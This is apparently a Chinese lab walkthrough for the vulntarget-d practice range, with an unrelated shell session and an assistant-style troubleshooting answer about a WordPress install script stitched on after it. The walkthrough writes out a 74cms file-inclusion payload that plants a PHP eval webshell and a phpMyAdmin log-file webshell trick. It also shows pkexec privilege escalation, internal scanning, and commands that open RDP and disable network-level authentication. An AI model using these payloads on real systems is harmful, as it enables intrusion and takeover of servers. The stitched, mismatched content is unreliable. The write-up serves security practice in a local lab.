【vulntarget】系列:vulntarget-d 练习WP

关注WX:【小白SEC】查看更多内容……


本文仅为学习【vulntarget】,在本地环境测试验证,无其它目的,请勿进行未经授权的测试

一、靶场信息:

下载地址:

百度云链接:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 
提取码:1p9p

**拓扑图:**IP信息根据本地搭建环境自行配置改变,Ubuntu需要更改静态IP

官方WP:vulntarget漏洞靶场系列(四)— vulntarget-d

二、使用到的工具、漏洞或技术:

工具:
Viper、nmap
漏洞或技术:
骑士cms相关漏洞、隧道代理、免杀

三、步骤:

  1. 通过端口扫描工具,查找靶机IP及端口信息,此处靶机的IP为192.168.0.108,直接扫描靶机IP信息

image.png

  1. 访问各个端口,发现 81 端口存在 骑士CMS:

image.png

  1. 此处存在文件包含GetShell漏洞,操作如下:
    • 访问URL,发送POST请求:

URL:http://192.168.0.108:81/index.php?m=home&a=assign_resume_tpl
请求数据:

variable=1&tpl=<?php fputs(fopen("test.php","w"),"<?php phpinfo();eval(\$_REQUEST['test']);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
  • 发送成功后,再发送POST请求:

URL:http://192.168.0.108:81/index.php?m=home&a=assign_resume_tpl
请求数据:

variable=1&tpl=data/Runtime/Logs/Home/aa_bb_cc.log
#aa_bb_cc.log			2023年1月1日,则修改为:23_01_01.log

image.png

  • 生成的Shell地址为:http://192.168.0.108:81/test.php

image.png

  1. Viper开启监听,生成 .elf 文件并上传执行:

image.png
image.png

  1. 此时为低权限,进行提权操作:

image.png

  1. 此处使用: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 提权:

image.png

  1. 添加路由,进行内网探测,使用 auxiliary/scanner/portscan/tcp 扫描:
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.52.1/24RHOSTS => 192.168.52.1/24

msf6 auxiliary(scanner/portscan/tcp) > set PORTS 21,22,23,80,443,8080,3389,445
PORTS => 21,22,23,80,443,8080,3389,445
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.52.1:         - 192.168.52.1:445 - TCP OPEN
[+] 192.168.52.3:         - 192.168.52.3:80 - TCP OPEN
[+] 192.168.52.4:         - 192.168.52.4:445 - TCP OPEN
[+] 192.168.52.4:         - 192.168.52.4:80 - TCP OPEN
[*] 192.168.52.1/24:      - Scanned  26 of 256 hosts (10% complete)
[*] 192.168.52.1/24:      - Scanned  52 of 256 hosts (20% complete)
[*] 192.168.52.1/24:      - Scanned  77 of 256 hosts (30% complete)
[*] 192.168.52.1/24:      - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.52.1/24:      - Scanned 128 of 256 hosts (50% complete)
[*] 192.168.52.1/24:      - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.52.1/24:      - Scanned 180 of 256 hosts (70% complete)
[*] 192.168.52.1/24:      - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.52.1/24:      - Scanned 231 of 256 hosts (90% complete)


[*] 192.168.52.1/24:      - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >

image.png

  1. 配置代理,访问发现的内网 80 端口没有什么信息,使用工具进行目录扫描:

image.png
image.png

  1. 访问 phpMyadmin ,弱口令: root/root :

image.png

  1. 使用phpMyadmin修改日志路径getshell:
SELECT @@datadir;			#获取路径信息
SHOW  VARIABLES  LIKE  '%general%';			#查看日志状态
set global general_log=on;			#将 general_log 设置为on
set global general_log_file='C:/phpstudy/PHPTutorial/www/test.php';			#修改log文件的名称和位置
SELECT 'Shell内容'			#随便select一个Shell内容

image.png
image.png

  1. 蚁剑配置代理连接Shell:

image.png

  1. Viper设置代理转发上线,生成的后门程序需要免杀:

image.png
image.png

  1. Viper查看,此处直接使用 getsystem 提权:

image.png

  1. 获取密码信息,获得明文账号信息: crow/admin

image.png

  1. 开启远程登录:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  1. 配置代理登录:

image.png

  1. 完整链路图:

需要修改虚拟机网卡
image.png
image.png

靶场WP持续更新……

[root@yfw ~]# cd /www/wwwroot/yfw_szrengjing_com [root@yfw yfw_szrengjing_com]# chmod +x install-wp-im-enhanced.sh chmod: cannot access 'install-wp-im-enhanced.sh': No such file or directory [root@yfw yfw_szrengjing_com]# ./install-wp-im-enhanced.sh --domain yfw.szrengjing.com --site-root /www/wwwroot/yfw_szrengjing_com -bash: ./install-wp-im-enhanced.sh: No such file or directory [root@yfw yfw_szrengjing_com]# ls -la total 300 drwxr-xr-x 6 www www 4096 Nov 13 20:53 . drwxr-xr-x 12 www www 4096 Nov 13 13:43 .. -rwxr-xr-x 1 www www 138 Nov 13 13:43 404.html -rwxr-xr-x 1 www www 341 Nov 13 13:43 auto_install.json -rwxr-xr-x 1 www www 10760 Nov 13 17:04 deploy-im.sh -rwxr-xr-x 1 www www 1 Nov 13 13:43 .htaccess -rwxr-xr-x 1 www www 405 Nov 13 13:43 index.php -rwxr-xr-x 1 www www 16748 Nov 13 21:26 install-wp-im.sh -rwxr-xr-x 1 www www 19903 Nov 13 14:46 license.txt -rwxr-xr-x 1 www www 7425 Nov 13 14:46 readme.html -rw-r--r-- 1 www www 3335 Nov 13 20:57 websocket-test.html drwxr-xr-x 2 www www 4096 Nov 13 18:09 workerman -rwxr-xr-x 1 www www 7387 Nov 13 13:43 wp-activate.php drwxr-xr-- 9 www www 4096 Aug 21 2024 wp-admin -rwxr-xr-x 1 www www 351 Nov 13 13:43 wp-blog-header.php -rwxr-xr-x 1 www www 2323 Nov 13 13:43 wp-comments-post.php -rw-rw-rw- 1 www www 3330 Nov 13 13:44 wp-config.php -rwxr-xr-x 1 www www 3336 Nov 13 14:46 wp-config-sample.php drwxr-xr-x 7 www www 4096 Nov 13 16:33 wp-content -rwxr-xr-x 1 www www 5617 Nov 13 14:46 wp-cron.php drwx------ 30 www www 16384 Nov 13 14:46 wp-includes -rwxr-xr-x 1 www www 2502 Nov 13 13:43 wp-links-opml.php -rwxr-xr-x 1 www www 3937 Nov 13 13:43 wp-load.php -rwxr-xr-x 1 www www 51414 Nov 13 14:46 wp-login.php -rwxr-xr-x 1 www www 8727 Nov 13 14:46 wp-mail.php -rwxr-xr-x 1 www www 30081 Nov 13 14:46 wp-settings.php -rwxr-xr-x 1 www www 34516 Nov 13 14:46 wp-signup.php -rwxr-xr-x 1 www www 5102 Nov 13 14:46 wp-trackback.php -rwxr-xr-x 1 www www 3205 Nov 13 14:46 xmlrpc.php [root@yfw yfw_szrengjing_com]#
最新发布
11-14
你遇到的问题非常明确: ``` chmod: cannot access 'install-wp-im-enhanced.sh': No such file or directory -bash: ./install-wp-im-enhanced.sh: No such file or directory ``` 而通过 `ls -la` 的输出可以看到: - ✅ 你有一个名为 **`install-wp-im.sh`** 的脚本(大小 16748 字节) - ❌ 但没有叫 `install-wp-im-enhanced.sh` 的文件 --- ### 🔍 结论:**你运行错了脚本名** 你应该运行的是: ```bash ./install-wp-im.sh ``` 而不是: ```bash ./install-wp-im-enhanced.sh # ❌ 这个文件不存在 ``` --- ## ✅ 正确操作步骤如下: ### 1. 确认脚本存在 ```bash ls -l install-wp-im.sh ``` 输出应类似: ``` -rwxr-xr-x 1 www www 16748 Nov 13 21:26 install-wp-im.sh ``` ### 2. 添加可执行权限(虽然已经是绿色的,但确保万无一失) ```bash chmod +x install-wp-im.sh ``` ### 3. 正确执行脚本(使用正确的名字!) ```bash ./install-wp-im.sh --domain yfw.szrengjing.com --site-root /www/wwwroot/yfw_szrengjing_com ``` > ⚠️ 注意:`--domain` 后是你的域名,`--site-root` 是当前目录完整路径。 --- ## 🛠️ 如果提示权限问题或用户不对? 你的文件所有者是 `www`,所以建议用 `sudo -u www` 切换用户运行: ```bash sudo -u www ./install-wp-im.sh --domain yfw.szrengjing.com --site-root /www/wwwroot/yfw_szrengjing_com ``` 这样避免因 PHP 执行用户与 shell 用户不一致导致的权限错误。 --- ## 💡 补充建议 ### ✅ 检查 PHP CLI 是否可用 ```bash php -v ``` 如果报错,请安装 PHP CLI: ```bash # CentOS/RHEL yum install php-cli -y # Ubuntu/Debian apt install php-cli -y ``` ### ✅ 安装 curl 和 openssl(脚本可能需要) ```bash yum install curl openssl -y ``` ### ✅ 确保 composer 可用(脚本会自动安装,但最好提前准备) ```bash curl -sS https://getcomposer.org/installer | php mv composer.phar /usr/local/bin/composer ``` --- ## 🧩 脚本功能回顾(根据你现有的 `install-wp-im.sh`) 从文件名和大小判断,这个脚本大概率已经包含以下功能: | 功能 | 是否支持 | |------|----------| | 创建插件目录 | ✅ | | 生成 Workerman WebSocket 服务端 | ✅ | | 使用 Composer 安装 workerman/workerman | ✅ | | 生成前端测试页 `websocket-test.html` | ✅(你在 ls 中看到了)| | 输出 Nginx 配置 | ✅(预期会有)| | 生成 systemd 服务 | ✅ | 所以只要 **正确运行它**,就能完成部署。 --- ## ✅ 最终命令清单 ```bash # 1. 进入网站根目录 cd /www/wwwroot/yfw_szrengjing_com # 2. 确保脚本有执行权限 chmod +x install-wp-im.sh # 3. 以 www 用户身份运行(推荐) sudo -u www ./install-wp-im.sh --domain yfw.szrengjing.com --site-root /www/wwwroot/yfw_szrengjing_com ``` --- ## 📌 成功后你会看到: - 新建目录:`wp-content/plugins/wp-im-plugin/` - 自动生成:`im-server.php`、`vendor/`、`composer.lock` - 出现日志:`/tmp/workerman_stdout.log` - 可启动服务:`systemctl start wp-im-server` - 可访问测试页:`https://yfw.szrengjing.com/websocket-test.html` --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值